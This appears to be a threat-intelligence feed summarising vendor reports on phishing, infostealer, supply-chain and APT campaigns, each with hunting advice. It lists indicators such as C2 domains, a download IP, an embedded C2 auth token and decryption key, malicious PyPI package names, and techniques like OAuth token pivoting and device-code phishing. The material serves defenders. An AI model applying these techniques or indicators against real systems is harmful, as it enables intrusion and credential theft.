DFIR Radar

Hundreds of cybersecurity blogs, research reports, and advisories published every day. No one has time to read them all. And the one report that matters? It's buried somewhere in the noise. That's why DFIR Radar exists. We monitor the cybersecurity landscape around the clock. Every article is evaluated for DFIR relevance. Only what's genuinely useful makes it through. The rest never reaches your feed. This feed is the result of that process. Every article is sourced, evaluated, and published only if it meets the standard. If you find something we missed, our Discord community lets you contribute directly. Discord community: discord.gg/rHkqgs53bF Built by a practitioner who needed this to exist. Follow once. Stay informed forever. #DFIR_Radar

Source: cofense.com/blog/steal-sma…

Attackers abuse Vercel's AI web development platform to mass-produce convincing phishing sites spoofing major brands with simple text prompts. #DFIR_Radar

Source: vectra.ai/blog/shinyhunt…

ShinyHunters isn't one group—it's a brand applied to supply chain attacks using stolen credentials, vishing, and OAuth token abuse. Real pattern: legitimate auth followed by rapid persistence, SaaS enumeration, then data exfiltration. #DFIR_Radar

Source: specterops.io/blog/2026/05/0…

SpecterOps researchers dissect Visual Studio Code Dev Tunnels protocol, revealing a multi-layered C2 framework disguised as legitimate developer tooling. New attack paths exploit OAuth2 flows and Microsoft's Family of Client IDs (FOCI). Technical breakdown: • 4-layer protocol stack: REST API management → WebSocket tunnel → SSH connection → MsgPack RPC messaging • RPC methods enable full remote access: spawn (command execution), fs_read/write (file operations), sys_kill (process termination) • Authentication via GitHub (client ID: 01ab8ac9400c4e429b23) or Azure (client ID: aebc6443-996d-45c2-90f0-388ff96faa56) • FOCI exploitation: 49 Microsoft clients can pivot tokens to access dev tunnels, including Teams and Azure Portal • Device code phishing viable against both GitHub and Azure OAuth flows Attack surface expansion: • Persistence: Deploy tunnels from compromised hosts for long-term access • Lateral movement: Pivot through existing dev tunnel infrastructure • Initial access: Exploit FOCI/BroCI token relationships for tunnel hijacking • Credential harvesting: Tokens stored in VS Code's state.vscdb database Hunt for unexpected WebSocket connections to `*.devtunnels.ms` domains and monitor OAuth token requests to the specified client IDs. Full Ouroboros C2 tool available at the researchers' GitHub. #DFIR_Radar

Source: microsoft.com/en-us/security…

Microsoft tracks macOS ClickFix campaign using fake utility guides to deliver SHub Stealer, Macsync, and AMOS infostealers. Three distinct attack chains bypass Gatekeeper by leveraging Terminal commands instead of traditional app bundles. Key technical details: • Initial access via fake troubleshooting sites hosting Base64-encoded Terminal commands • Loader campaign creates persistence at ~/LaunchAgents/com.google.keystone.agent.plist mimicking Google Update • Script campaign uses Telegram fallback C2 (hxxps://t[.]me/ax03bot) when primary infrastructure fails • Helper campaign (AMOS) stages payloads in /tmp/helper or /tmp/update with virtualization detection • All variants collect Keychain entries, browser credentials, cryptocurrency wallets, and iCloud data Attack methodology: • Social engineering through Medium blogs and Squarespace sites claiming macOS "fixes" • Terminal execution bypasses Gatekeeper checks applied to .dmg files • Russian/CIS keyboard layouts trigger kill switch in loader variant • Trojanized crypto apps replace legitimate Trezor Suite, Ledger Wallet, and Exodus installations Data exfiltration to endpoints like /api/debug/event, /gate/chunk, /upload.php, and /contact. Staging directories use patterns /tmp/shub_ and cleanup artifacts post-exfiltration. Hunt for curl commands with Base64 payloads, osascript execution from network streams, and LaunchAgent plist creation in user directories. #DFIR_Radar

Source: securelist.com/oceanlotus-sus…

OceanLotus 🇻🇳 deploys ZiChatBot malware via PyPI supply chain attack targeting Python developers globally. Campaign active since July 2025 uses Zulip chat APIs as C2 infrastructure instead of traditional servers. Key technical details: • Three malicious PyPI packages (uuid32-utils, colorinal, termncolor) disguised as legitimate utilities with cross-platform Windows/Linux support • ZiChatBot dropper (terminate.dll/terminate.so) uses AES-CBC decryption with key "xterminalunicode" and LZMA decompression • Persistence via Registry Run key (Windows) or crontab (Linux): %LOCALAPPDATA%\vcpacket\vcpktsvr.exe • C2 communications through Zulip REST APIs using auth token TW9yaWFuLWJvdEBoZWxwZXIuenVsaXBjaGF0LmNvbTpVOFJFWGxJNktmOHFYQjlyUXpPUEJpSUE0YnJKNThxRw== • KTAE analysis shows 64% code similarity to previous OceanLotus droppers Hunt for Python installations with recent %LOCALAPPDATA%\vcpacket\ directory creation, Registry Run entries for "pkt-update", and network connections to helper[.]zulipchat[.]com. #DFIR_Radar

Source: rapid7.com/blog/post/tr-m…

Iranian 🇮🇷 state-sponsored group MuddyWater masqueraded as Chaos ransomware in false flag operation, combining social engineering via Microsoft Teams with data exfiltration instead of encryption. Campaign targeting US 🇺🇸 organizations reveals growing convergence of APT and cybercriminal tactics. Key technical details: • Initial access via Teams screen-sharing sessions to harvest credentials and manipulate MFA (T1566, T1556) • Custom Game.exe RAT masquerading as WebView2, using AES-256-GCM encrypted config and anti-VM checks • "Donald Gay" code-signing certificate previously linked to MuddyWater's Operation Olalampo • C2 infrastructure: moonzonet[.]com, uploadfiler[.]com, with persistence via DWAgent/AnyDesk (T1219) • No file encryption despite ransomware branding - primary goal was espionage/data theft Attack methodology: • Interactive Teams sessions for credential harvesting into local text files (credentials.txt, cred.txt) • Deployment of ms_upd.exe downloader via curl from 172[.]86[.]126[.]208:443 • Multi-stage payload delivery: WebView2Loader.dll, Game.exe, visualwincomp.txt config • Lateral movement via compromised accounts and RDP sessions Hunt for unsigned executables in C:\ProgramData\visualwincomp-* directories, monitor Teams external chat requests with screen-sharing, and check for DWAgent service installations. Full YARA rules and IOCs in the report. #DFIR_Radar

Source: elastic.co/security-labs/…

New Brazilian banking trojan TCLBANKER hijacks WhatsApp and Outlook to self-propagate while targeting 59 financial institutions with sophisticated WPF-based social engineering overlays. • **Technical Arsenal**: Environment-gated AES decryption, syscall trampolines, ETW patching, comprehensive watchdog targeting analysis tools (Frida, x64dbg, IDA, ProcessHacker). Uses DLL sideloading against legitimate Logitech LogiAiPromptBuilder.exe • **Attack Chain**: MSI installer → DLL sideload → .NET Reactor-protected modules (banker + worm). Geofencing requires Brazilian 🇧🇷 locale/timezone. Persistence via scheduled task "RuntimeOptimizeService" • **Social Engineering**: Full-screen WPF overlays with fake Windows Update screens, credential prompts with Brazilian phone formatting, "vishing wait screens" for phone-based fraud. Overlays invisible to screen capture tools via WDA_EXCLUDEFROMCAPTURE • **Self-Propagation**: WhatsApp bot clones browser profiles to hijack authenticated sessions, sends malicious links to contacts. Outlook bot uses COM automation to send phishing emails from victim's own account • **Infrastructure**: All C2/distribution on Cloudflare Workers (campanha1-api.ef971a42[.]workers[.]dev, mxtestacionamentos[.]com). Developer artifacts suggest early operational stage Hunt for LogiAiPromptBuilder.exe with suspicious child processes, monitor for .NET assemblies loaded from %LocalAppData%\LogiAI, and detect WebSocket connections to suspicious domains. #DFIR_Radar

Source: malwarebytes.com/blog/threat-in…

Attackers weaponize JavaScript runtime Bun to distribute NWHStealer infostealer through game trainers and software cracks. Novel technique uses legitimate bundling tool to evade detection while targeting browsers and crypto wallets. Key technical details: • NWHStealer distributed via ZIP archives containing Installer.exe with JavaScript bundled using Bun runtime • Anti-VM scoring system uses 10+ PowerShell CIM/WMI commands checking CPU, disk, memory, processes against sandbox indicators • Two-stage C2 communication: /api/report sends system info, /api/status gets AES seed, /api/update retrieves encrypted payload • Final payload decrypted with AES-256-CBC and injected using VirtualAlloc/VirtualProtect via Bun's FFI module • Targets browsers, crypto wallets, FTP clients (FileZilla, CoreFTP), messaging apps (Steam, Discord) Impact includes credential theft, cryptocurrency wallet compromise, and potential secondary payload deployment like XMRig miners. C2 domains include silent-harvester[.]cc and whale-ether[.]pro. Hunt for Bun.exe processes with network connections to low-reputation domains and PowerShell child processes executing CIM queries for hardware enumeration. #DFIR_Radar

Source: securityaffairs.com/191748/securit…

CVE-2026-0300 actively exploited against Palo Alto PAN-OS firewalls - buffer overflow in User-ID portal enables unauthenticated RCE with root privileges (CVSS 9.3). Restrict portal access to trusted internal IPs until patches release May 13-28. #DFIR_Radar

Source: blog.talosintelligence.com/insights-into-…

Cisco Talos analysis reveals phone numbers in scam emails have 14-day median lifespan, with VoIP providers like Sinch most abused. Sequential number blocks and cross-brand reuse patterns expose organized call center infrastructure. #DFIR_Radar